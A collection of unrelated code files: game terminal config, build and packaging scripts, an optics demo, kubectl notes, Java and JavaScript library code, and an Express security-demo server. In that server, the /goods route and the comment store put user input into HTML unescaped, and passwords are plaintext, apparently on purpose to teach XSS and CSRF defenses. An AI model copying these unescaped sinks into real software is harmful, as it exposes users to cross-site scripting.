"W19N22":10000,
"W18N22":0
},
sellingGoods:{
//[(resourceType),(reservedAmount),(minSellAmount)]
"W22N25":[[RESOURCE_SWITCH,0,25]],
"W23N25":[],
"W21N24":[[RESOURCE_BATTERY,1000,1000]],
"W19N22":[],
"W18N22":[]
},
buyingGoods:{
//[(resourceType),(beginBuyingAmount),(endBuyingAmount)]
"W22N25":[[RESOURCE_OXYGEN,2500,5000],[RESOURCE_LEMERGIUM,2500,5000],[RESOURCE_UTRIUM,2500,5000],[RESOURCE_ZYNTHIUM,2500,5000],[RESOURCE_ENERGY,100000,150000]],
"W23N25":[[RESOURCE_OXYGEN,2500,5000]],
"W21N24":[[RESOURCE_OXYGEN,2500,5000]],
"W19N22":[],
"W18N22":[]
},
mostDesiredGoods:{ // Buy as much as it can
interval:10,
[RESOURCE_POWER]:{
maxPrice:4.5, // Will buy these goods under this line
minCredits:10000,
}
},
}
module.exports = terminalConfiguration
#!/usr/bin/env bash
# Conda-build recipe script for rrdtool: configure with language bindings and
# docs disabled, build, run the test suite (with known failures excluded on
# macOS), and install into $PREFIX.
set -euo pipefail
IFS=$'\n\t'
./configure \
"--prefix=${PREFIX}" \
"--with-systemdsystemunitdir=${PREFIX}/lib/systemd/system" \
--disable-python \
--disable-perl \
--disable-ruby \
--disable-lua \
--disable-tcl \
--disable-docs
make "-j${CPU_COUNT}"
XFAIL_TESTS=""
if [[ "$(uname)" == "Darwin" && "${PKG_VERSION}" == "1.7.2" ]]; then
# Known failure, should be fixed in the next version
# https://github.com/oetiker/rrdtool-1.x/issues/1012
XFAIL_TESTS="${XFAIL_TESTS} rpn2"
fi
# Dump the suite log on failure so CI output shows the reason.
make check XFAIL_TESTS="${XFAIL_TESTS}" || (cat tests/test-suite.log && exit 1)
make install
|
# LightPipes demo: propagate a laterally shifted circular aperture over 10 m
# (Fresnel diffraction) and report the centroid of the resulting intensity
# pattern — expected near the aperture's (5 mm, 3 mm) shift.
from LightPipes import *
wavelength = 500*nm
size = 25*mm   # physical side length of the square grid
N = 500        # grid resolution (N x N samples)
F = Begin(size, wavelength, N)
F = CircAperture(F, 2*mm, x_shift = 5*mm, y_shift = 3*mm)
F = Fresnel(F, 10*m)
Xc,Yc, NXc, NYc = Centroid(F)
print("Xc = {:4.2f} mm, Yc = {:4.2f} mm".format(Xc/mm, Yc/mm))
|
<reponame>sillyhong/whongjiagou-learn<filename>50.safe/src/server.js
const express = require('express');
const path = require('path');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');
var svgCaptcha = require('svg-captcha');
// Security-demo express app: static assets from ./public, JSON/urlencoded
// bodies, and cookie parsing for the hand-rolled session store below.
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(cookieParser());
app.use(express.static(path.resolve(__dirname, 'public')));
const goods = {
'book': [{ name: '变形计' }, { name: '双城记' }],
'electronic': [{ name: 'ipad' }, { name: 'iphone' }]
}
// NOTE(review): `category` is interpolated into HTML unescaped — a reflected
// XSS sink. Presumably intentional in this security-demo project; confirm.
app.get('/goods', function (req, res) {
let { category } = req.query;
res.setHeader('Content-Type', 'text/html;charset=utf8');
let currentGoods = goods[category];
let detail = '';
if (currentGoods) {
detail = currentGoods.map(item => `<li>${item.name}</li>`).join('')
} else {
detail = '此分类下面没有商品';
}
res.send(`
<h1>你选择的商品分类是: ${category}</h1>
<ul>${detail}</ul>
`);
});
// This route returns all comments.
let defaultComment = { time: new Date().toLocaleString(), avatar: 'http://www.gravatar.com/avatar/836875012qq.com.png' };
let comments = [
{ username: '张三', content: '今天下雨了', ...defaultComment },
{ username: '李四', content: '今天没带伞', ...defaultComment }
];
app.get('/api/comments', function (req, res) {
res.json({ code: 0, comments });
});
// Escape the five HTML-significant characters so user input can be embedded
// in markup safely. BUGFIX: the entity names had been decoded back to their
// literal characters (e.g. replacing & with '&'), turning every replacement
// into a no-op; restored the proper entities. '&' must be replaced first so
// later entities are not double-escaped.
function htmlEncode(str) {
    return String(str)
        .replace(/&/g, '&amp;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;');
}
// Create a comment for the logged-in user (session resolved via the
// httpOnly sessionId cookie, e.g. sessionId=session-1528513256445657.39...).
// NOTE(review): the content is stored verbatim; htmlEncode() exists above
// but is not applied — confirm whether escaping happens client-side.
app.post('/api/comments', function (req, res) {
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
let comment = req.body;// username content
comments.push({
...defaultComment,
username: session.user.username,
content: comment.content
});
res.json({ code: 0 });
} else {
res.json({ code: 1, error: '此用户未登录,不能发表评论 ' });
}
});
// In-memory user fixtures for the demo (plaintext passwords on purpose).
let users = [
    { username: 'a', password: 'a', balance: 1000 },
    { username: 'b', password: 'b', balance: 1000 }
];
// Look up a user with matching username AND password; returns undefined when
// none match. BUGFIX: the password comparison had been mangled to a
// `<PASSWORD>` placeholder; restored the comparison against user.password.
function getAdmin(user) {
    return users.find(u => u.username == user.username && u.password == user.password);
}
// Server-side session store: sessionId -> { user, captcha? }.
let sessions = {};
// Login: on success create a server-side session and hand the client two
// cookies — the httpOnly session id, and a readable CSRF token derived from it.
app.post('/api/login', function (req, res) {
let body = req.body;// username password
let user = getAdmin(body);
if (user) {// on successful login, set the cookie and create the session
let sessionId = 'session-' + Date.now() + Math.random() * 1000;
// hand the sessionId value to the client
res.cookie('sessionId', sessionId, { httpOnly: true });
res.cookie('token', 'token_' + sessionId);
// record the data belonging to this session id on the server side
sessions[sessionId] = { user };
res.json({ code: 0, user });
} else {
res.json({ code: 1, error: '用户名密码错误' });
}
});
// Return the logged-in user's profile, or an error when not authenticated.
app.get('/userInfo', function (req, res) {
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
res.json({ code: 0, user: session.user });
} else {
res.json({ code: 1, error: '用户未登录' });
}
});
// Transfer money between users. CSRF defenses demonstrated here, in order:
// Referer allow-list, double-submit token check, then captcha check.
app.post('/api/transfer', function (req, res) {
let referer = req.headers['referer'];//http://localhost:3000
if (/^https?:\/\/localhost:3000/.test(referer)) {
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
let { target, amount, captcha, clientToken } = req.body;// target amount
if (clientToken == 'token_' + req.cookies.sessionId) {
if (captcha == session.captcha) {
amount = isNaN(amount) ? 0 : Number(amount);
for (let i = 0; i < users.length; i++) {
if (users[i].username == session.user.username) {
users[i].balance -= amount;
} else if (users[i].username == target) {
users[i].balance += amount;
}
}
res.json({ code: 0 });
} else {
res.json({ code: 1, error: '验证码不正确' });
}
} else {
res.json({ code: 1, error: 'token验证失败' });
}
} else {
res.json({ code: 1, error: '用户未登录' });
}
} else {
res.json({ code: 1, error: 'refer错误 ' });
}
});
// Issue a fresh SVG captcha for the current session.
app.get('/api/captcha', function (req, res) {
let session = sessions[req.cookies.sessionId];
if (session) {
var captcha = svgCaptcha.create();// generate the captcha
session.captcha = captcha.text;// keep the captcha text in the session for verification
res.json({ code: 0, data: captcha.data });// data is the SVG image of the captcha
} else {
res.json({ code: 1, error: '用户未登录' });
}
});
app.listen(3000);
# Safely evict all pods from a node (e.g. before an OS/version upgrade)
kubectl drain <node-name>
# Mark a node as unschedulable (no new pods will be scheduled on it)
kubectl cordon <node-name>
# Mark a cordoned node as schedulable again
kubectl uncordon <node-name>
Version skew example with releases 1.10, 1.11 and 1.12:
=> api-server: 1.11
=> scheduler + controller-manager: 1.10 or 1.11
=> kube-proxy + kubelet: 1.10 or 1.11
=> kubectl: 1.11 or 1.12
/*
* Copyright (C) 2012-2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package info.archinnov.achilles.internal.persistence.operations;
import static com.google.common.collect.FluentIterable.from;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.COLLECTION_AND_MAP_FIELD;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.EXTRACT_META;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.SIMPLE_FIELD;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import info.archinnov.achilles.internal.context.facade.EntityOperations;
import info.archinnov.achilles.internal.metadata.holder.EntityMeta;
import info.archinnov.achilles.internal.metadata.holder.PropertyMeta;
import info.archinnov.achilles.internal.proxy.ProxyInterceptor;
import info.archinnov.achilles.internal.proxy.dirtycheck.DirtyCheckChangeSet;
import info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker;
import info.archinnov.achilles.internal.validation.Validator;
/**
 * Flushes the pending changes of a proxified entity: dirty simple fields,
 * collection/map change sets, and counter columns.
 */
public class EntityUpdater {
    private static final Logger log = LoggerFactory.getLogger(EntityUpdater.class);

    private final PropertyMetaComparator comparator = new PropertyMetaComparator();
    private final CounterPersister counterPersister = CounterPersister.Singleton.INSTANCE.get();
    private final EntityProxifier proxifier = EntityProxifier.Singleton.INSTANCE.get();

    /**
     * Merges the given proxified entity: emits update statements for all
     * dirty fields through the operation context, persists counters, and
     * resets the proxy's dirty-tracking state.
     *
     * @param context operations facade used to emit the update statements
     * @param entity  proxified entity to merge; must not be {@code null}
     */
    public void update(EntityOperations context, Object entity) {
        log.debug("Merging entity of class {} with primary key {}", context.getEntityClass().getCanonicalName(),
                context.getPrimaryKey());

        EntityMeta entityMeta = context.getEntityMeta();

        Validator.validateNotNull(entity, "Proxy object should not be null for update");
        Validator.validateNotNull(entityMeta, "entityMeta should not be null for update");

        log.debug("Checking for dirty fields before merging");

        Object realObject = proxifier.getRealObject(entity);
        context.setEntity(realObject);

        ProxyInterceptor<Object> interceptor = proxifier.getInterceptor(entity);
        Map<Method, DirtyChecker> dirtyMap = interceptor.getDirtyMap();
        List<DirtyChecker> dirtyCheckers = new ArrayList<>(dirtyMap.values());

        // Idiom fix: isEmpty() instead of size() > 0.
        if (!dirtyCheckers.isEmpty()) {
            pushDirtySimpleFields(context, dirtyCheckers);
            pushCollectionAndMapUpdates(context, dirtyCheckers);
            // Dirty state has been flushed; reset tracking for the proxy.
            dirtyMap.clear();
        }

        // Counters are persisted regardless of dirty fields; clustered
        // counters take a dedicated path.
        if (context.isClusteredCounter()) {
            counterPersister.persistClusteredCounters(context);
        } else {
            counterPersister.persistCounters(context, entityMeta.getAllCounterMetas());
        }
        interceptor.setEntityOperations(context);
        interceptor.setTarget(realObject);
    }

    // Emits one statement per collection/map change set recorded by the
    // dirty checkers.
    private void pushCollectionAndMapUpdates(EntityOperations context, List<DirtyChecker> dirtyCheckers) {
        final List<DirtyChecker> collectionsAndMaps = from(dirtyCheckers)
                .filter(COLLECTION_AND_MAP_FIELD)
                .toList();
        for (DirtyChecker dirtyChecker : collectionsAndMaps) {
            for (DirtyCheckChangeSet changeSet : dirtyChecker.getChangeSets()) {
                context.pushCollectionAndMapUpdateStatements(changeSet);
            }
        }
    }

    // Collects dirty simple fields, sorts them by CQL3 column name so the
    // generated statement shape is deterministic, then pushes one statement.
    private void pushDirtySimpleFields(EntityOperations context, List<DirtyChecker> dirtyCheckers) {
        final List<PropertyMeta> sortedSimpleMetas = new ArrayList<>(from(dirtyCheckers)
                .filter(SIMPLE_FIELD)
                .transform(EXTRACT_META)
                .toList());
        if (!sortedSimpleMetas.isEmpty()) {
            Collections.sort(sortedSimpleMetas, comparator);
            context.pushUpdateStatement(sortedSimpleMetas);
        }
    }

    /** Orders {@link PropertyMeta} instances by their CQL3 column name. */
    public static class PropertyMetaComparator implements Comparator<PropertyMeta> {
        @Override
        public int compare(PropertyMeta arg0, PropertyMeta arg1) {
            return arg0.getCQL3ColumnName().compareTo(arg1.getCQL3ColumnName());
        }
    }

    /** Enum-based singleton holder (project-wide singleton convention). */
    public static enum Singleton {
        INSTANCE;

        private final EntityUpdater instance = new EntityUpdater();

        public EntityUpdater get() {
            return instance;
        }
    }
}
|
TERMUX_PKG_HOMEPAGE=https://github.com/jtyr/gbt
TERMUX_PKG_DESCRIPTION="Highly configurable prompt builder for Bash and ZSH written in Go"
TERMUX_PKG_LICENSE="MIT"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=2.0.0
TERMUX_PKG_REVISION=2
TERMUX_PKG_SRCURL=https://github.com/jtyr/gbt/archive/v${TERMUX_PKG_VERSION}.tar.gz
TERMUX_PKG_SHA256=b324695dc432e8e22bc257f7a6ec576f482ec418fb9c9a8301f47bfdf7766998
# Commit hash of the release; its first 6 characters are embedded into the
# binary as the build id via -ldflags below.
_COMMIT=29dc3dac6c06518073a8e879d2b6ec65291ddab2

# Custom install step: gbt has no "make install" target, so build with the Go
# toolchain directly and copy the binary and assets into the Termux prefix.
termux_step_make_install() {
    cd $TERMUX_PKG_SRCDIR
    termux_setup_golang
    # Pre-modules GOPATH layout: symlink the source tree into GOPATH so the
    # github.com/jtyr/gbt import paths resolve.
    export GOPATH=$HOME/go
    mkdir -p $GOPATH/{bin,pkg,src/github.com/jtyr}
    ln -fs $TERMUX_PKG_SRCDIR $GOPATH/src/github.com/jtyr/gbt
    go build -ldflags="-s -w -X main.version=$TERMUX_PKG_VERSION -X main.build=${_COMMIT::6}" -o $TERMUX_PREFIX/bin/gbt github.com/jtyr/gbt/cmd/gbt
    # Ship theme/source data and documentation alongside the binary.
    mkdir -p $TERMUX_PREFIX/{doc/gbt,share/gbt}
    cp -r $TERMUX_PKG_SRCDIR/{sources,themes} $TERMUX_PREFIX/share/gbt/
    cp -r $TERMUX_PKG_SRCDIR/{LICENSE,README.md} $TERMUX_PREFIX/doc/gbt/
}
|
// Repository: fr1t2/docusign-node-client
/**
* DocuSign REST API
* The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
*
* OpenAPI spec version: v2.1
* Contact: <EMAIL>
*
* NOTE: This class is auto generated. Do not edit the class manually and submit a new issue instead.
*
*/
(function(root, factory) {
if (typeof define === 'function' && define.amd) {
// AMD. Register as an anonymous module.
define(['ApiClient', 'model/AddressInformation', 'model/ConnectUserObject', 'model/ErrorDetails', 'model/ForgottenPasswordInformation', 'model/Group', 'model/NameValue', 'model/UserSettingsInformation'], factory);
} else if (typeof module === 'object' && module.exports) {
// CommonJS-like environments that support module.exports, like Node.
module.exports = factory(require('../ApiClient'), require('./AddressInformation'), require('./ConnectUserObject'), require('./ErrorDetails'), require('./ForgottenPasswordInformation'), require('./Group'), require('./NameValue'), require('./UserSettingsInformation'));
} else {
// Browser globals (root is window)
if (!root.Docusign) {
root.Docusign = {};
}
root.Docusign.UserInformation = factory(root.Docusign.ApiClient, root.Docusign.AddressInformation, root.Docusign.ConnectUserObject, root.Docusign.ErrorDetails, root.Docusign.ForgottenPasswordInformation, root.Docusign.Group, root.Docusign.NameValue, root.Docusign.UserSettingsInformation);
}
}(this, function(ApiClient, AddressInformation, ConnectUserObject, ErrorDetails, ForgottenPasswordInformation, Group, NameValue, UserSettingsInformation) {
'use strict';
/**
* The UserInformation model module.
* @module model/UserInformation
* @version 3.0.0
*/
/**
* Constructs a new <code>UserInformation</code>.
* @alias module:model/UserInformation
* @class
*/
var exports = function() {
var _this = this;
};
/**
* Constructs a <code>UserInformation</code> from a plain JavaScript object, optionally creating a new instance.
* Copies all relevant properties from <code>data</code> to <code>obj</code> if supplied or a new instance if not.
* @param {Object} data The plain JavaScript object bearing properties of interest.
* @param {module:model/UserInformation} obj Optional instance to populate.
* @return {module:model/UserInformation} The populated <code>UserInformation</code> instance.
*/
exports.constructFromObject = function(data, obj) {
if (data) {
obj = obj || new exports();
if (data.hasOwnProperty('activationAccessCode')) {
obj['activationAccessCode'] = ApiClient.convertToType(data['activationAccessCode'], 'String');
}
if (data.hasOwnProperty('company')) {
obj['company'] = ApiClient.convertToType(data['company'], 'String');
}
if (data.hasOwnProperty('connectConfigurations')) {
obj['connectConfigurations'] = ApiClient.convertToType(data['connectConfigurations'], [ConnectUserObject]);
}
if (data.hasOwnProperty('countryCode')) {
obj['countryCode'] = ApiClient.convertToType(data['countryCode'], 'String');
}
if (data.hasOwnProperty('createdDateTime')) {
obj['createdDateTime'] = ApiClient.convertToType(data['createdDateTime'], 'String');
}
if (data.hasOwnProperty('customSettings')) {
obj['customSettings'] = ApiClient.convertToType(data['customSettings'], [NameValue]);
}
if (data.hasOwnProperty('defaultAccountId')) {
obj['defaultAccountId'] = ApiClient.convertToType(data['defaultAccountId'], 'String');
}
if (data.hasOwnProperty('email')) {
obj['email'] = ApiClient.convertToType(data['email'], 'String');
}
if (data.hasOwnProperty('enableConnectForUser')) {
obj['enableConnectForUser'] = ApiClient.convertToType(data['enableConnectForUser'], 'String');
}
if (data.hasOwnProperty('errorDetails')) {
obj['errorDetails'] = ErrorDetails.constructFromObject(data['errorDetails']);
}
if (data.hasOwnProperty('firstName')) {
obj['firstName'] = ApiClient.convertToType(data['firstName'], 'String');
}
if (data.hasOwnProperty('forgottenPasswordInfo')) {
obj['forgottenPasswordInfo'] = ForgottenPasswordInformation.constructFromObject(data['forgottenPasswordInfo']);
}
if (data.hasOwnProperty('groupList')) {
obj['groupList'] = ApiClient.convertToType(data['groupList'], [Group]);
}
if (data.hasOwnProperty('homeAddress')) {
obj['homeAddress'] = AddressInformation.constructFromObject(data['homeAddress']);
}
if (data.hasOwnProperty('initialsImageUri')) {
obj['initialsImageUri'] = ApiClient.convertToType(data['initialsImageUri'], 'String');
}
if (data.hasOwnProperty('isAdmin')) {
obj['isAdmin'] = ApiClient.convertToType(data['isAdmin'], 'String');
}
if (data.hasOwnProperty('isNAREnabled')) {
obj['isNAREnabled'] = ApiClient.convertToType(data['isNAREnabled'], 'String');
}
if (data.hasOwnProperty('jobTitle')) {
obj['jobTitle'] = ApiClient.convertToType(data['jobTitle'], 'String');
}
if (data.hasOwnProperty('lastLogin')) {
obj['lastLogin'] = ApiClient.convertToType(data['lastLogin'], 'String');
}
if (data.hasOwnProperty('lastName')) {
obj['lastName'] = ApiClient.convertToType(data['lastName'], 'String');
}
if (data.hasOwnProperty('loginStatus')) {
obj['loginStatus'] = ApiClient.convertToType(data['loginStatus'], 'String');
}
if (data.hasOwnProperty('middleName')) {
obj['middleName'] = ApiClient.convertToType(data['middleName'], 'String');
}
if (data.hasOwnProperty('password')) {
obj['password'] = ApiClient.convertToType(data['password'], 'String');
}
if (data.hasOwnProperty('passwordExpiration')) {
obj['passwordExpiration'] = ApiClient.convertToType(data['passwordExpiration'], 'String');
}
if (data.hasOwnProperty('permissionProfileId')) {
obj['permissionProfileId'] = ApiClient.convertToType(data['permissionProfileId'], 'String');
}
if (data.hasOwnProperty('permissionProfileName')) {
obj['permissionProfileName'] = ApiClient.convertToType(data['permissionProfileName'], 'String');
}
if (data.hasOwnProperty('profileImageUri')) {
obj['profileImageUri'] = ApiClient.convertToType(data['profileImageUri'], 'String');
}
if (data.hasOwnProperty('sendActivationEmail')) {
obj['sendActivationEmail'] = ApiClient.convertToType(data['sendActivationEmail'], 'String');
}
if (data.hasOwnProperty('sendActivationOnInvalidLogin')) {
obj['sendActivationOnInvalidLogin'] = ApiClient.convertToType(data['sendActivationOnInvalidLogin'], 'String');
}
if (data.hasOwnProperty('signatureImageUri')) {
obj['signatureImageUri'] = ApiClient.convertToType(data['signatureImageUri'], 'String');
}
if (data.hasOwnProperty('subscribe')) {
obj['subscribe'] = ApiClient.convertToType(data['subscribe'], 'String');
}
if (data.hasOwnProperty('suffixName')) {
obj['suffixName'] = ApiClient.convertToType(data['suffixName'], 'String');
}
if (data.hasOwnProperty('title')) {
obj['title'] = ApiClient.convertToType(data['title'], 'String');
}
if (data.hasOwnProperty('uri')) {
obj['uri'] = ApiClient.convertToType(data['uri'], 'String');
}
if (data.hasOwnProperty('userAddedToAccountDateTime')) {
obj['userAddedToAccountDateTime'] = ApiClient.convertToType(data['userAddedToAccountDateTime'], 'String');
}
if (data.hasOwnProperty('userId')) {
obj['userId'] = ApiClient.convertToType(data['userId'], 'String');
}
if (data.hasOwnProperty('userName')) {
obj['userName'] = ApiClient.convertToType(data['userName'], 'String');
}
if (data.hasOwnProperty('userProfileLastModifiedDate')) {
obj['userProfileLastModifiedDate'] = ApiClient.convertToType(data['userProfileLastModifiedDate'], 'String');
}
if (data.hasOwnProperty('userSettings')) {
obj['userSettings'] = UserSettingsInformation.constructFromObject(data['userSettings']);
}
if (data.hasOwnProperty('userStatus')) {
obj['userStatus'] = ApiClient.convertToType(data['userStatus'], 'String');
}
if (data.hasOwnProperty('userType')) {
obj['userType'] = ApiClient.convertToType(data['userType'], 'String');
}
if (data.hasOwnProperty('workAddress')) {
obj['workAddress'] = AddressInformation.constructFromObject(data['workAddress']);
}
}
return obj;
}
/**
* The activation code the new user must enter when activating their account.
* @member {String} activationAccessCode
*/
exports.prototype['activationAccessCode'] = undefined;
/**
*
* @member {String} company
*/
exports.prototype['company'] = undefined;
/**
*
* @member {Array.<module:model/ConnectUserObject>} connectConfigurations
*/
exports.prototype['connectConfigurations'] = undefined;
/**
*
* @member {String} countryCode
*/
exports.prototype['countryCode'] = undefined;
/**
* Indicates the date and time the item was created.
* @member {String} createdDateTime
*/
exports.prototype['createdDateTime'] = undefined;
/**
* The name/value pair information for the user custom setting.
* @member {Array.<module:model/NameValue>} customSettings
*/
exports.prototype['customSettings'] = undefined;
/**
*
* @member {String} defaultAccountId
*/
exports.prototype['defaultAccountId'] = undefined;
/**
*
* @member {String} email
*/
exports.prototype['email'] = undefined;
/**
* Specifies whether the user is enabled for updates from DocuSign Connect. Valid values: true or false.
* @member {String} enableConnectForUser
*/
exports.prototype['enableConnectForUser'] = undefined;
/**
* @member {module:model/ErrorDetails} errorDetails
*/
exports.prototype['errorDetails'] = undefined;
/**
* The user's first name. Maximum Length: 50 characters.
* @member {String} firstName
*/
exports.prototype['firstName'] = undefined;
/**
* @member {module:model/ForgottenPasswordInformation} forgottenPasswordInfo
*/
exports.prototype['forgottenPasswordInfo'] = undefined;
/**
* A list of the group information for groups to add the user to. Group information can be found by calling [ML:GET group information]. The only required parameter is groupId. The parameters are: * groupId - The DocuSign group ID for the group. * groupName - The name of the group * permissionProfileId - The ID of the permission profile associated with the group. * groupType - The group type.
* @member {Array.<module:model/Group>} groupList
*/
exports.prototype['groupList'] = undefined;
/**
* @member {module:model/AddressInformation} homeAddress
*/
exports.prototype['homeAddress'] = undefined;
/**
* Contains the URI for an endpoint that you can use to retrieve the initials image.
* @member {String} initialsImageUri
*/
exports.prototype['initialsImageUri'] = undefined;
/**
* Determines if the feature set is actively set as part of the plan.
* @member {String} isAdmin
*/
exports.prototype['isAdmin'] = undefined;
/**
*
* @member {String} isNAREnabled
*/
exports.prototype['isNAREnabled'] = undefined;
/**
*
* @member {String} jobTitle
*/
exports.prototype['jobTitle'] = undefined;
/**
* Shows the date-time when the user last logged on to the system.
* @member {String} lastLogin
*/
exports.prototype['lastLogin'] = undefined;
/**
* The user's last name. Maximum Length: 50 characters.
* @member {String} lastName
*/
exports.prototype['lastName'] = undefined;
/**
* Shows the current status of the user's password. Possible values are: * password_reset * password_active * password_expired * password_locked * password_reset_failed
* @member {String} loginStatus
*/
exports.prototype['loginStatus'] = undefined;
/**
* The user's middle name. Maximum Length: 50 characters.
* @member {String} middleName
*/
exports.prototype['middleName'] = undefined;
/**
*
* @member {String} password
*/
exports.prototype['password'] = undefined;
/**
*
* @member {String} passwordExpiration
*/
exports.prototype['passwordExpiration'] = undefined;
/**
*
* @member {String} permissionProfileId
*/
exports.prototype['permissionProfileId'] = undefined;
/**
*
* @member {String} permissionProfileName
*/
exports.prototype['permissionProfileName'] = undefined;
/**
*
* @member {String} profileImageUri
*/
exports.prototype['profileImageUri'] = undefined;
/**
*
* @member {String} sendActivationEmail
*/
exports.prototype['sendActivationEmail'] = undefined;
/**
* When set to **true**, specifies that an additional activation email is sent to the user if they fail a log on before activating their account.
* @member {String} sendActivationOnInvalidLogin
*/
exports.prototype['sendActivationOnInvalidLogin'] = undefined;
/**
* Contains the URI for an endpoint that you can use to retrieve the signature image.
* @member {String} signatureImageUri
*/
exports.prototype['signatureImageUri'] = undefined;
/**
*
* @member {String} subscribe
*/
exports.prototype['subscribe'] = undefined;
/**
* The suffix for the user's name. Maximum Length: 50 characters.
* @member {String} suffixName
*/
exports.prototype['suffixName'] = undefined;
/**
* The title of the user.
* @member {String} title
*/
exports.prototype['title'] = undefined;
/**
*
* @member {String} uri
*/
exports.prototype['uri'] = undefined;
/**
*
* @member {String} userAddedToAccountDateTime
*/
exports.prototype['userAddedToAccountDateTime'] = undefined;
/**
*
* @member {String} userId
*/
exports.prototype['userId'] = undefined;
/**
*
* @member {String} userName
*/
exports.prototype['userName'] = undefined;
/**
*
* @member {String} userProfileLastModifiedDate
*/
exports.prototype['userProfileLastModifiedDate'] = undefined;
/**
* @member {module:model/UserSettingsInformation} userSettings
*/
exports.prototype['userSettings'] = undefined;
/**
*
* @member {String} userStatus
*/
exports.prototype['userStatus'] = undefined;
/**
*
* @member {String} userType
*/
exports.prototype['userType'] = undefined;
/**
* @member {module:model/AddressInformation} workAddress
*/
exports.prototype['workAddress'] = undefined;
return exports;
}));
|
/*
* dbtype_PropertyDataSerializer.cpp
*/
#include "dbtypes/dbtype_PropertyDataSerializer.h"
namespace mutgos
{
namespace dbtype
{
    // ----------------------------------------------------------------------
    // Default constructor.  Intentionally empty: the serializer holds no
    // state of its own.
    PropertyDataSerializer::PropertyDataSerializer()
    {
    }

    // ----------------------------------------------------------------------
    // Destructor.  Nothing to release.
    // NOTE(review): both special members could be "= default" if the project
    // targets C++11+ — confirm against the header before changing.
    PropertyDataSerializer::~PropertyDataSerializer()
    {
    }
} /* namespace dbtype */
} /* namespace mutgos */
|
#!/bin/bash
# Use https://developers.google.com/closure/compiler/ to compile this code.
# Compiler should be available at ../../closure/compiler.jar relative to this build script.

# --- Step 1: compile the core WebMapJS sources into WMJS.min.js -------------
# ES6 in, strict ES5 out; CommonJS modules are resolved Node-style.
rm -rf WMJS.min.js
java -jar ../../closure/compiler.jar --language_in=ECMASCRIPT6 --language_out ES5_STRICT --process_common_js_modules \
    --module_resolution=NODE \
    --js ../webmapjs_h/WMJSPolyfills.js \
    --js ../webmapjs_h/WMJSProcessing.js \
    --js ../webmapjs_h/WMJSTimeSelector.js \
    --js ../webmapjs_h/WMJSTimeSlider.js \
    --js ../webmapjs_h/WMJS_GFITimeElevation.js \
    --js ../webmapjs_h/WMJSCoverage.js \
    --js ../webmapjs/WMJSExternalDependencies.js \
    --js ../webmapjs/WMJSConstants.js \
    --js ../webmapjs/WMJSGlobals.js \
    --js ../webmapjs/WMJSGetServiceFromStore.js \
    --js ../webmapjs/I18n/lang.en.js \
    --js ../webmapjs/WMJSTimer.js \
    --js ../webmapjs/WMJSDebouncer.js \
    --js ../webmapjs/WMJSAnimate.js \
    --js ../webmapjs/WMJSTools.js \
    --js ../webmapjs/WMJSLayer.js \
    --js ../webmapjs/WMJSTime.js \
    --js ../webmapjs/WMJSTileRenderer.js \
    --js ../webmapjs/WMJSImageStore.js \
    --js ../webmapjs/WMJSMap.js \
    --js ../webmapjs/WMJSProjection.js \
    --js ../webmapjs/WMJSBBOX.js \
    --js ../webmapjs/WMJSDimension.js \
    --js ../webmapjs/WMJSService.js \
    --js ../webmapjs/WMJSListener.js \
    --js ../webmapjs/WMJSImage.js \
    --js ../webmapjs/WMJSXMLParser.js \
    --js ../webmapjs/WMJSCanvasBuffer.js \
    --js ../webmapjs/WMJSDialog.js \
    --js ../webmapjs/WMJSDrawMarker.js \
    --js ../webmapjs_h/WMJSDefineGlobals.js \
    --js ../webmapjs_h/WMJSImportsToGlobal.js \
    --create_source_map WMJS.min.js.map \
    --js_output_file WMJS.min.js
# Append the source-map pointer so browsers can find WMJS.min.js.map.
echo "//# sourceMappingURL=WMJS.min.js.map" >> WMJS.min.js
#
# rm -rf jquery-addons.min.js
# java -jar ../../closure/compiler.jar --language_in=ECMASCRIPT6 --language_out ES5_STRICT \
#   --js ../jquery/jquery.mousewheel.js \
#   --js ../jquery/jquery-ui-timepicker-addon.js \
#   --js ../jquery/globalize.js \
#   --js_output_file jquery-addons.min.js
#

# --- Step 2: bundle third-party libs + WMJS.min.js into one distributable ---
rm -rf adagucwebmapjs
mkdir adagucwebmapjs
echo "" > adagucwebmapjs/webmapjs.min.js
cat ../libs/d3/d3.v3.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/d3/c3.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/moment/moment.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/proj4/dist/proj4.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/jquery/dist/jquery.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/jquery-ui-dist/jquery-ui.min.js >> adagucwebmapjs/webmapjs.min.js
cat WMJS.min.js >> adagucwebmapjs/webmapjs.min.js
# Matching stylesheet bundle.
echo "" > adagucwebmapjs/webmapjs.min.css
cat ../webmapjs/WMJSStyles.css >> adagucwebmapjs/webmapjs.min.css
cat ../webmapjs_h/WMJS_GFITimeElevation.css >> adagucwebmapjs/webmapjs.min.css
cat ../webmapjs_h/WMJSTimeSelector.css >> adagucwebmapjs/webmapjs.min.css

# --- Step 3: compile the WMJSExt UI extensions into WMJSExt.min.js ----------
rm -f WMJSExt.min.js
